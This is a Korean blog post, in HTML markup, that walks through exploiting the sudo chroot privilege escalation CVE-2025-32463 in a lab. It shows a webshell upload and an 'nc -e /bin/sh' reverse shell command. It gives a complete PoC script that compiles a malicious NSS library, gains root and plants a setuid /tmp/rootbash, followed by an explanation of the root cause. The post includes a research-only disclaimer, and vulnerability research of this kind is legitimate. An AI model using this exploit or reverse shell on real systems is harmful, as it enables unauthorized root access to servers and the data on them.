&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;취약점 실습 상세&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7bPSk/btsPAKU2Pxm/54fcujTPwPqWiO4gRUDZT1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7bPSk/btsPAKU2Pxm/54fcujTPwPqWiO4gRUDZT1/img.png&quot; data-alt=&quot;취약 서비스 내 악성 웹쉘 업로드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7bPSk/btsPAKU2Pxm/54fcujTPwPqWiO4gRUDZT1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7bPSk%2FbtsPAKU2Pxm%2F54fcujTPwPqWiO4gRUDZT1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1238&quot; height=&quot;916&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;취약 서비스 내 악성 웹쉘 업로드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;우선 공격 대상 웹 서비스 내 명령어를 실행시켜야하므로 업로드 취약점이 발생하는 구간 내 웹쉘 업로드를 수행해준다.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/19NdK/btsPATEsVe7/Rc8oSw3m69KURs9yETY9jK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/19NdK/btsPATEsVe7/Rc8oSw3m69KURs9yETY9jK/img.png&quot; data-alt=&quot;sudo 버전 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/19NdK/btsPATEsVe7/Rc8oSw3m69KURs9yETY9jK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F19NdK%2FbtsPATEsVe7%2FRc8oSw3m69KURs9yETY9jK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1238&quot; height=&quot;916&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudo 버전 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bUhWgL/btsPAxBGM5V/ozhLei6LHkKC8iCGP8Esnk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bUhWgL/btsPAxBGM5V/ozhLei6LHkKC8iCGP8Esnk/img.png&quot; data-alt=&quot;sudoers 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bUhWgL/btsPAxBGM5V/ozhLei6LHkKC8iCGP8Esnk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbUhWgL%2FbtsPAxBGM5V%2FozhLei6LHkKC8iCGP8Esnk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1238&quot; height=&quot;916&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudoers 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;일반적인 웹쉘 환경에서는 sudoers.d, sudoers 파일, sudo -l 권한, chroot 지시자 등 poc 파일 배치와 실행, 결과확인 및 2차 확장시에 제한되고 오류 확인이 어려우므로 웹쉘을 이용한 리버스 쉘 권한 취득이 필요하다.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FLX05/btsPBk922To/T5kBGG36zLaVULNQ7Q85U1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FLX05/btsPBk922To/T5kBGG36zLaVULNQ7Q85U1/img.png&quot; data-alt=&quot;쉘 연결을 위한 공격자 터미널 내 nc (본 공격자 이용포트 4444) 리버스 커넥션 대기&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FLX05/btsPBk922To/T5kBGG36zLaVULNQ7Q85U1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFLX05%2FbtsPBk922To%2FT5kBGG36zLaVULNQ7Q85U1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;쉘 연결을 위한 공격자 터미널 내 nc (본 공격자 이용포트 4444) 리버스 커넥션 대기&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/maPg6/btsPBluk3Ru/7bx6AyK9UoyQ1fkVPBkZF1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/maPg6/btsPBluk3Ru/7bx6AyK9UoyQ1fkVPBkZF1/img.png&quot; data-alt=&quot;공격 대상 서버 내 업로드된 웹쉘에서 공격지로 nc 리버스 커넥션 시도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/maPg6/btsPBluk3Ru/7bx6AyK9UoyQ1fkVPBkZF1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmaPg6%2FbtsPBluk3Ru%2F7bx6AyK9UoyQ1fkVPBkZF1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1238&quot; height=&quot;916&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상 서버 내 업로드된 웹쉘에서 공격지로 nc 리버스 커넥션 시도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;pre id=&quot;code_1753774088838&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;nc -e /bin/sh 127.0.0.1 9191&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;해당 공격 대상 서버에서 9191 포트 - 공격지 서버 포트 정보로 리버스 쉘을 시도한다. ip가 로컬 host 로 사용된 이유는 테스트 환경 상 tcptunneling 설정이 되어있기 때문이다. (환경 구성 페이지 참조)&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bs86xB/btsPBkWw9ZN/bwMN9bz501jmkihVzADTJ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bs86xB/btsPBkWw9ZN/bwMN9bz501jmkihVzADTJ0/img.png&quot; data-alt=&quot;공격 대상 서버에서 리버스 쉘 획득 성공&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bs86xB/btsPBkWw9ZN/bwMN9bz501jmkihVzADTJ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbs86xB%2FbtsPBkWw9ZN%2FbwMN9bz501jmkihVzADTJ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상 서버에서 리버스 쉘 획득 성공&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;리버스 쉘 획득에 성공하고 공격자 서버에서 리버스 쉘을 이용하여 명령어를 이용하면 입력하는 명령에 대해 정상 수행 가능한 것을 확인할 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GLNwo/btsPB0JXYN9/eAbYrjRIMil1R2d7KgbkeK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GLNwo/btsPB0JXYN9/eAbYrjRIMil1R2d7KgbkeK/img.png&quot; data-alt=&quot;대상 서버 내 sudo 버전 재확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GLNwo/btsPB0JXYN9/eAbYrjRIMil1R2d7KgbkeK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGLNwo%2FbtsPB0JXYN9%2FeAbYrjRIMil1R2d7KgbkeK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;대상 서버 내 sudo 버전 재확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;서버 내에서 리버스 쉘 획득 성공 여부를 확인하고 이후 CVE-2025-32463 공격을 위해 쉘 파일을 작성해주자.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/brpwj1/btsPAXgbdII/kLSDWspGM98jtzUSdxhlsK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/brpwj1/btsPAXgbdII/kLSDWspGM98jtzUSdxhlsK/img.png&quot; data-alt=&quot;cat 을 이용한 shell 파일 작성&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/brpwj1/btsPAXgbdII/kLSDWspGM98jtzUSdxhlsK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbrpwj1%2FbtsPAXgbdII%2FkLSDWspGM98jtzUSdxhlsK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;cat 을 이용한 shell 파일 작성&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;pre id=&quot;code_1753774379222&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;cat &amp;gt; cve-2025-32463.sh &amp;lt;&amp;lt; 'EOF'
#!/bin/bash

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat &amp;gt; kai_ht.c&amp;lt;&amp;lt;'CEOF'
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir(&quot;/&quot;);
  system(&quot;id &amp;gt; /tmp/pwned_proof.txt&quot;);
  system(&quot;cp /bin/bash /tmp/rootbash &amp;amp;&amp;amp; chmod +s /tmp/rootbash&quot;);
  execl(&quot;/bin/bash&quot;, &quot;/bin/bash&quot;, NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo &quot;passwd: /kai_ht&quot; &amp;gt; pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/kai_ht.so.2 kai_ht.c

echo &quot;Exploiting CVE-2025-32463...&quot;
sudo -R pentest pentest
rm -rf ${STAGE?}
echo &quot;root permition enable!&quot;
EOF&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;해당 코드는 shell 파일이긴 하나, libnss 파일 컴파일을 위한 서버 내 컴파일러가 요구된다. 때문에 해당 공격을 위한 gcc 및 컴파일러가 대상 서버에서 동작하는지에 대한 여부 확인이 요구된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;※ 본 코드는 &lt;span style=&quot;color: #ee2323;&quot;&gt;연구목적으로 작성된 코드&lt;/span&gt;다. 절대 실 &lt;span style=&quot;color: #ee2323;&quot;&gt;네트워크 망에서 사용을 금&lt;/span&gt;하며, 참고용으로 확인하자.&lt;br /&gt;해당 코드에 대한 &lt;span style=&quot;color: #ee2323;&quot;&gt;책임을 작성자가 지지 않으며, 코드 사용에 대한 책임은 코드 사용 본인이 지는 것&lt;/span&gt;임을 잊지 말자.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/0Wlno/btsPDnjYLX8/L7L4l1axNHMVlwgBTVIi70/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/0Wlno/btsPDnjYLX8/L7L4l1axNHMVlwgBTVIi70/img.png&quot; data-alt=&quot;root 권한 탈취 및 root 권한 요구 파일 열람 가능 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/0Wlno/btsPDnjYLX8/L7L4l1axNHMVlwgBTVIi70/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F0Wlno%2FbtsPDnjYLX8%2FL7L4l1axNHMVlwgBTVIi70%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;root 권한 탈취 및 root 권한 요구 파일 열람 가능 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;해당 쉘 코드 실행 시, root 권한 탈취로 서버 내 root 권한이 요구되는 파일에 대한 임의 열람 및 실행이 가능한 것을 확인할 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/uikcv/btsPBoEA2bn/fSXEx2BZppbFqOhELf20d1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/uikcv/btsPBoEA2bn/fSXEx2BZppbFqOhELf20d1/img.png&quot; data-alt=&quot;서버 내 존재하는 서비스 php 파일 열람&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/uikcv/btsPBoEA2bn/fSXEx2BZppbFqOhELf20d1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fuikcv%2FbtsPBoEA2bn%2FfSXEx2BZppbFqOhELf20d1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;서버 내 존재하는 서비스 php 파일 열람&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;취약점이 발생하는 원인은 다음과 같이 정리할 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;i&gt;chroot 의 동작 흐름 문제&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 본 sudo 의 정상흐름 (기대 흐름)&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;1. 사용자 명령어 Guessing&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;2. sudoers 정책 검증 (권한 확인)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;3. 환경 설정 (chroot 등)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;4. 명령어 실행&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 실제 동작 흐름&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;1. 사용자 명령어 Guessing&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;2. chroot 환경 변경 (pivot_root 실행) // 문제 발생 지점&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;3. sudoers 정책 검증 (변경된 환경에서 검증 유발)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;4. 명령어 실행&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;i&gt;기술적 세부사항&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;1. &lt;span style=&quot;background-color: #f3c000;&quot;&gt;&lt;b&gt;pivot_root&lt;/b&gt;&lt;/span&gt; 함수 조기 실행&lt;/span&gt;&lt;/h4&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;pivot_root 함수가 보안 정책 검증 - permission check 이전 호출&lt;/li&gt;
&lt;li&gt;사용자 지정 임의 디렉터리로 파일 시스템 루트가 변경 가능&lt;/li&gt;
&lt;li&gt;이후 모든 파일 참조가 공격자가 제어하는 환경에서 수행&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;2. NSS - Name Service Switch 시스템 악용&lt;/span&gt;&lt;/h4&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;sudo 인증 과정 중, &lt;span style=&quot;background-color: #f3c000;&quot;&gt;/etc/nsswitch.conf&lt;/span&gt; 파일을 참조하여 사용자 정보 조회 모듈 로드 시, 해당 모듈에 대한 조작이 가능함.&lt;/li&gt;
&lt;li&gt;/etc/nsswitch.conf 파일 예시:&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;2.1. 정상 &lt;span style=&quot;background-color: #f3c000;&quot;&gt;nsswitch.conf&lt;/span&gt; 파일&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;passwd: files systemd &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;group:&amp;nbsp;files&amp;nbsp;systemd &lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;2.2. 공격자 조작 파일 (PoC 참고)&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 17px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 100%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt; &lt;span style=&quot;color: #4d4d4c; text-align: right;&quot;&gt;passwd: /kai_ht&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #4d4d4c; text-align: right;&quot;&gt;group: /kai_ht&lt;/span&gt; &lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;nbsp;3. 악성 공유 라이브러리 로드&lt;/span&gt;&lt;/h4&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;chroot 환경에서 sudo가 /etc/nsswitch.conf 를 읽음&lt;/li&gt;
&lt;li&gt;공격자가 지정한 NSS 라이브러리 (libnss_/kai_ht.so.2) 를 참조&lt;/li&gt;
&lt;li&gt;해당 라이브러리가 root 권한으로 로드 및 실행&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;해당 PoC 코드에 대한 설명이다.&lt;/span&gt;&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;STAGE 변수 내 /tmp 디렉토리 내 임시 작업 공간을 생성한다.&lt;/li&gt;
&lt;li&gt;악성 NSS 라이브러리를 작성 ( uid/gid 세팅 및 root 쉘 실행 등) 한다. (kai_ht.c)&lt;/li&gt;
&lt;li&gt;chroot 환경을 구성하는데, pentest/etc/nsswitch.conf 파일, 그러니까 악성 라이브러리를 참조하는데, 이때 passwd 값을 설정해주고 gcc 를 이용한 악성코드를 생성한다.&lt;/li&gt;
&lt;li&gt;만들어진 악성코드를 chroot 옵션으로 공격을 수행한다.&lt;/li&gt;
&lt;/ol&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;i&gt;&lt;b&gt;관련 핵심 함수&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.1163%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;함수 명&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 79.8837%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;설명&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.1163%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;pivot_root&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 79.8837%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;파일시스템 루트 변경&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.1163%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;set_cmnd_path&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 79.8837%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;명령어 경로 설정 - 변경된 환경에서 동작&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.1163%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;command_matches&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 79.8837%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;명령어 매칭 검증 - 환경 변조 후 실행되어 우회&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
